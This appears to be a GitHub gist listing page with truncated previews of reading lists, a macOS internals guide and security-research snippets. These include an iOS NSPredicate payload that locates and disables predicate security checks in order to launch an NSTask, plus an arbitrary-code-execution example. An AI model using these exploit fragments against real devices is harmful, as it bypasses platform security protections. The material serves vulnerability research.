
@tin-z
tin-z / VR_roadmap.md
Last active July 22, 2024 03:05
Becoming a Vulnerability Researcher roadmap: my personal experience
@veekaybee
veekaybee / normcore-llm.md
Last active July 26, 2024 01:10
Normcore LLM Reads

Anti-hype LLM reading list

Goals: Add links that are reasonable and good explanations of how stuff works. No hype and no vendor content if possible. Practical first-hand accounts of models in prod eagerly sought.

Foundational Concepts

Pre-Transformer Models

@aemmitt-ns
aemmitt-ns / restricted.m
Created May 19, 2023 14:06
program to dump out forbidden classes and selectors in NSPredicates
// dump classes and selectors forbidden in NSPredicates
// `cc -framework Foundation -o restricted restricted.m`
#import <Foundation/Foundation.h>
#import <dlfcn.h>
int main() {
    // CoreFoundation exports the predicate policy tables as private (underscore) symbols
    void *cf = dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", 0);
    NSDictionary* (*RestrictedClasses)() = (NSDictionary* (*)())dlsym(cf, "_CFPredicatePolicyRestrictedClasses");
    NSDictionary* (*RestrictedSelectors)() = (NSDictionary* (*)())dlsym(cf, "_CFPredicatePolicyRestrictedSelectors");
    NSLog(@"Restricted Classes: %@", RestrictedClasses());
    NSLog(@"Restricted Selectors: %@", RestrictedSelectors());
    return 0;
}
@kconner
kconner / macOS Internals.md
Last active July 7, 2024 19:42
macOS Internals

Understand your Mac and iPhone more deeply by tracing the evolution of Mac OS X from prerelease to Swift. John Siracusa delivers the details.

Starting Points

How to use this gist

You've got two main options:

@rain-1
rain-1 / LLM.md
Last active July 27, 2024 04:02
LLM Introduction: Learn Language Models

Purpose

Bootstrap knowledge of LLMs ASAP. With a bias/focus to GPT.

Avoid being a link dump. Try to provide only valuable well tuned information.

Prelude

Neural network links before starting with transformers.

@aemmitt-ns
aemmitt-ns / funtime.js
Last active December 30, 2023 06:26
funtime: detailed objective-c runtime tracing. ex `python funtime.py -n Messages '-[NSRegularExpression *]'`
// Objective-C type-encoding characters mapped to their C type names
const typeMap = {
"c": "char",
"i": "int",
"s": "short",
"l": "long",
"q": "long long",
"C": "unsigned char",
"I": "unsigned int",
"S": "unsigned short",
};
@aemmitt-ns
aemmitt-ns / nspredpayload.m
Last active December 30, 2023 06:26
NSPredicate payload for iOS that disables security checks and launches an NSTask
NSPredicate *pred = [NSPredicate predicateWithFormat:@"1=cast({" // cast to get nice error in syslog for debugging
// use format string to read the address of _NSPredicateUtilities ( #self() ); there's probably a better way
"$_NSPredicateUtilities := function('','stringByAppendingFormat:', '%p/%lld', #self()).lastPathComponent.longLongValue,"
"$_predicateSecurityFlags := $_NSPredicateUtilities + 0x188c," // address of _predicateSecurityFlags
"$_predicateSecurityOnce := $_predicateSecurityFlags - 0x276daec," // address of _predicateSecurityOnce
"$forbiddenClassesLength := $_predicateSecurityFlags + 0x63a334," // address of length field for array of forbidden classes
"$forbiddenSelectorsLength := $_predicateSecurityFlags + 0x63a3d4," // address of length field for array of forbidden selectors
"$NSTask := $_NSPredicateUtilities + 0x637860," // address of NSTask class
"$NSPipe := $NSTask - 0x41a0," // address of NSPipe class
@aemmitt-ns
aemmitt-ns / predicament.m
Created April 9, 2022 03:20
Non-deprecated NSPredicate arbitrary code exec example
#import <Foundation/Foundation.h>
/*
[~/predicament]$ gcc -framework Foundation -lobjc -o predicament predicament.m
[~/predicament]$ ./predicament "function('','stringByAppendingFormat:','%lld ').longLongValue"
Expr: 'FUNCTION("", "stringByAppendingFormat:" , "%lld ").longLongValue' (type: 4)
Value: 105553129238592
Danger: 105553129237664 (offset 928)
[~/predicament]$ ./predicament "function(function('','stringByAppendingFormat:','%lld ').longLongValue-928,'longValue').dangerous"
@muff-in
muff-in / resources.md
Last active July 28, 2024 09:13
A curated list of Assembly Language / Reversing / Malware Analysis / Game Hacking-resources
@Siguza
Siguza / pallas.sh
Last active July 17, 2024 19:15
newstyle OTA
#!/usr/bin/env zsh
set -e;
set +m; # Job control would've been nice, but manual round robin it is, sigh.
if [ -z "${ZSH_VERSION+x}" ]; then
echo 'Try again with zsh.';
exit 1;
fi;